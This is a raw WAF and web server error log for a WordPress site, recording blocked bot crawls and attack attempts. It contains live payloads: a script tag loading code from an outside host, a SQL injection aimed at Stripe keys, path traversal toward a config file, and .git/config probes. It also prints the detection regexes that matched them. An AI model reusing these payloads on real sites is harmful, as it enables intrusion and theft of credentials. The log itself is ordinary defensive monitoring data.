84.239.45.18:57418] [client 84.239.45.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZhgIEPs1nla_7pbeEOFCqgAAAEs"] [Thu Apr 11 10:56:01.595187 2024] [:error] [pid 29894:tid 140526221223680] [client 84.239.45.18:57420] [client 84.239.45.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZhgIERexM0f3xzCbeqVPvQAAAI8"] [Thu Apr 11 10:56:01.640485 2024] [:error] [pid 30580:tid 140526271579904] [client 84.239.45.18:57422] [client 84.239.45.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZhgIEXRVaX9G_VnUrCuPxgAAAMk"] [Thu Apr 11 10:56:01.659321 2024] [:error] [pid 29892:tid 140526391887616] [client 84.239.45.18:57424] [client 84.239.45.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZhgIEcSlb78yh_CPBW6P6wAAAAM"] [Thu Apr 11 10:56:01.686560 2024] [:error] [pid 29894:tid 140526196045568] [client 84.239.45.18:57426] [client 84.239.45.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZhgIERexM0f3xzCbeqVPvgAAAJI"] [Thu Apr 11 10:56:02.806873 2024] [:error] [pid 29893:tid 140526238009088] [client 84.239.45.18:57430] [client 84.239.45.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZhgIEvs1nla_7pbeEOFCqwAAAE0"] [Thu Apr 11 10:56:02.859265 2024] [:error] [pid 29894:tid 140526187652864] [client 84.239.45.18:57432] [client 84.239.45.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZhgIEhexM0f3xzCbeqVPvwAAAJM"] [Thu Apr 11 10:56:03.891739 2024] [:error] [pid 30580:tid 140526238009088] [client 84.239.45.18:57434] [client 84.239.45.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZhgIE3RVaX9G_VnUrCuPxwAAAM0"] [Thu Apr 11 10:56:03.904270 2024] [:error] [pid 29892:tid 140526288365312] [client 84.239.45.18:57436] [client 84.239.45.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZhgIE8Slb78yh_CPBW6P7AAAAAc"] [Thu Apr 11 10:56:04.961115 2024] [:error] [pid 29894:tid 140526145689344] [client 84.239.45.18:57438] [client 84.239.45.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZhgIFBexM0f3xzCbeqVPwAAAAJg"] [Thu Apr 11 14:24:32.325714 2024] [:error] [pid 29894:tid 140526145689344] [client 185.209.162.247:33100] [client 185.209.162.247] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://cdn.mediajsdelivery.com></script> found within ARGS:result[_msg]: <script src=https://cdn.mediajsdelivery.com></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "Zhg48BexM0f3xzCbeqVQbgAAAJg"] [Thu Apr 11 14:36:34.269767 2024] [:error] [pid 29894:tid 140526196045568] [client 185.247.226.37:33274] [client 185.247.226.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://cdn.mediajsdelivery.com></script> found within ARGS:result[_msg]: <script src=https://cdn.mediajsdelivery.com></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "Zhg7whexM0f3xzCbeqVQhgAAAJI"] [Thu Apr 11 15:48:20.096793 2024] [:error] [pid 29893:tid 140526204438272] [client 103.155.93.120:34804] [client 103.155.93.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://cdn.mediajsdelivery.com></script> found within ARGS:result[_msg]: <script src=https://cdn.mediajsdelivery.com></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "ZhhMlPs1nla_7pbeEOFDQgAAAFE"] [Thu Apr 11 17:29:32.197525 2024] [:error] [pid 29894:tid 140526246401792] [client 185.162.130.23:36362] [client 185.162.130.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://cdn.mediajsdelivery.com></script> found within ARGS:result[_msg]: <script src=https://cdn.mediajsdelivery.com></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "ZhhkTBexM0f3xzCbeqVRQQAAAIw"] [Thu Apr 11 18:53:03.495701 2024] [:error] [pid 30580:tid 140526375102208] [client 185.162.130.23:37854] [client 185.162.130.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://cdn.mediajsdelivery.com></script> found within ARGS:result[_msg]: <script src=https://cdn.mediajsdelivery.com></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "Zhh333RVaX9G_VnUrCuS2QAAAMU"] [Fri Apr 12 09:22:39.270726 2024] [:error] [pid 10143:tid 140053791573760] [client 192.0.87.51:51700] [client 192.0.87.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:signature. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: OnctV5dauOiqJeeKzRGUP4= found within ARGS:signature: WfqR OnctV5dauOiqJeeKzRGUP4="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZhlDr_A6kfM057vEnzjcoAAAANE"], referer: https://investigacionperu.com/?for=jetpack&jetpack=comms&token=Z5nUQajFXxnH%40s%29G4Tnlh9C%5E6NYFP%28XC%3A1%3A0×tamp=1712931759&nonce=JTsaFSuCNY&body-hash=%2B%2BBCriVDKZ4wtom97JPkJc9mBKs%3D&signature=WfqR%2BOnctV5dauOiqJeeKzRGUP4%3D [Sun Apr 14 04:21:22.654525 2024] [:error] [pid 3162:tid 140081742399232] [client 13.64.254.144:43054] [client 13.64.254.144] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/html"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZhugEpjV0yoxxyxDVSgjLwAAAJY"] 2024/04/16 16:15:18 [error] 12986#12986: *32842 access forbidden by rule, client: 185.156.72.30, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Thu Apr 18 15:57:31.606886 2024] [:error] [pid 20396:tid 140460731332352] [client 142.93.159.36:34570] [client 142.93.159.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(union(.*?)select(.*?)from)))" at ARGS:calculate_attribute_counts[][taxonomy]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "225"] [id "981276"] [msg "Looking for basic sql injection. Common attack string for mysql, oracle and others."] [data "Matched Data: union%20all%20select%201%2Coption_value%20from found within ARGS:calculate_attribute_counts[][taxonomy]: %22%29%20union%20all%20select%201%2Coption_value%20from%20wp_options%20where%20option_name%20like%20%27%25stripe%25%27%3B%00"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/wp-json/wc/store/products/collection-data"] [unique_id "ZiGJO24Hw7QVDmjmKTR8WgAAANI"] [Thu Apr 18 15:58:27.715857 2024] [:error] [pid 19759:tid 140460781688576] [client 198.71.241.17:34588] [client 198.71.241.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(union(.*?)select(.*?)from)))" at ARGS:calculate_attribute_counts[][taxonomy]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "225"] [id "981276"] [msg "Looking for basic sql injection. Common attack string for mysql, oracle and others."] [data "Matched Data: union%20all%20select%201%2Coption_value%20from found within ARGS:calculate_attribute_counts[][taxonomy]: %22%29%20union%20all%20select%201%2Coption_value%20from%20wp_options%20where%20option_name%20like%20%27%25stripe%25%27%3B%00"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/wp-json/wc/store/products/collection-data"] [unique_id "ZiGJc_LRsrYIDbZ2kTYdwgAAAIw"] [Thu Apr 18 17:06:07.481752 2024] [authz_core:error] [pid 19759:tid 140460848830208] [client 172.105.16.34:36862] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/04/18 17:06:10 [error] 19705#19705: *66495 access forbidden by rule, client: 172.105.16.34, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Apr 18 17:07:57.560620 2024] [authz_core:error] [pid 19759:tid 140460739725056] [client 143.244.168.161:36964] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/04/18 17:08:00 [error] 19705#19705: *66545 access forbidden by rule, client: 143.244.168.161, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Apr 18 17:08:41.148483 2024] [authz_core:error] [pid 20396:tid 140460697761536] [client 138.68.82.23:37040] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/04/18 17:08:44 [error] 19705#19705: *66594 access forbidden by rule, client: 138.68.82.23, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Apr 18 20:10:33.299257 2024] [authz_core:error] [pid 28906:tid 140460731332352] [client 139.162.210.205:41946] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/04/18 20:10:36 [error] 19705#19705: *69045 access forbidden by rule, client: 139.162.210.205, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Apr 20 16:49:51.780621 2024] [autoindex:error] [pid 18160:tid 140537638123264] [client 66.55.68.58:45038] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Apr 20 17:54:38.315226 2024] [autoindex:error] [pid 18162:tid 140537654908672] [client 20.171.82.100:46704] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Apr 21 01:22:15.030129 2024] [autoindex:error] [pid 18794:tid 140537671694080] [client 4.242.220.21:58234] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Apr 21 16:31:59.101719 2024] [autoindex:error] [pid 2225:tid 139660751709952] [client 66.55.68.58:49672] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 23 12:13:23.330378 2024] [autoindex:error] [pid 11914:tid 139915090016000] [client 81.0.246.138:36714] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Apr 24 00:31:36.439935 2024] [:error] [pid 11916:tid 139914985330432] [client 80.209.235.164:57234] [client 80.209.235.164] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/magmi-importer/web/download_file.php"] [unique_id "ZiiZOJg5JHRZxEYAM_5r5QAAAIg"] [Wed Apr 24 00:31:36.934631 2024] [:error] [pid 11916:tid 139915106801408] [client 80.209.235.164:57236] [client 80.209.235.164] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/shop/magmi-importer/web/download_file.php"] [unique_id "ZiiZOJg5JHRZxEYAM_5r5gAAAII"] [Thu Apr 25 01:42:58.991547 2024] [:error] [pid 31191:tid 139712299710208] [client 45.141.215.245:45170] [client 45.141.215.245] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:dstr. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/sample"] [unique_id "Zin7coDNu1w5S63wZoU4xQAAAFU"], referer: www.google.comhttps://t.me/optimasprimetools [Thu Apr 25 01:43:11.819465 2024] [:error] [pid 31804:tid 139712333281024] [client 45.141.215.245:45192] [client 45.141.215.245] ModSecurity: Access denied with code 403 